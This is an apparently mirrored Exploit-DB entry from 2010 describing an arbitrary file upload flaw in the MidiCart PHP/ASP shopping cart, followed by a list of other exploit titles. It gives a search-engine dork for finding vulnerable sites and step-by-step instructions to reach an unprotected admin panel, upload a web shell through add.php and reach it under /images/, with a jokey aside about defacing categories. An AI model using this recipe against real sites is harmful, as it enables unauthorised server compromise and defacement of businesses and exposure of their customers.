MidiCart PHP/ASP – Arbitrary File Upload

Exploit Database
12 阅读

作者： DigitALL

日期： 2010-05-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12636/

# Exploit Title: MidiCart PHP,ASP Shell Upload Vulnerability

# Date: 17.05.2010

# Author: DigitALL

# Software Link:
http://download.cnet.com/MidiCart-PHP-Shopping-Cart/3000-2649_4-10064577.html

# Version: All Version

# Tested on: DigitALL Xp Version x1

# Code :

[dork] : inurl:"order_money.php" or inurl:"order_money.asp" or "MidiCart PHP
Database Management"

[exploit] : Go To /admin/ &#304;f No Password(%80 No Password) Go To /add.php
Your Shell Upload.Shell Go To /images/shell.php

[other] : No Upload Shell Edited Categories Or Add Categories Hacked for
Script Kiddies :)

[thanks] : Efe KroNicKq NoFearx38 and All 1923Turk.com Members

[site] ://www.1923turk.com // www.digitallsecurity.org //
digit4ll.blogspot.com // www.hacker-zone.org // www.kankardes.com //

last Exploits
MidiCart PHP/ASP – Arbitrary File Upload的更多信息

JForum 2.08 – BBCode Color Tag HTML Injection：
dotCMS 3.2.4 – Multiple Vulnerabilities：
SirsiDynix e-Library 3.5.x – Cross-Site Scripting：
pfSense 2.3.2 – Cross-Site Scripting / Cross-Site Request Forgery：
bloofoxCMS 0.5.2.1 – CSRF (Add user)：
Mambo Component N-Gallery – SQL Injection：
PhpAlbum.net 0.4.1-14_fix06 – ‘var3’ Remote Command Execution：
Tina4 Stack 1.0.3 – SQL Injection / Database File Download：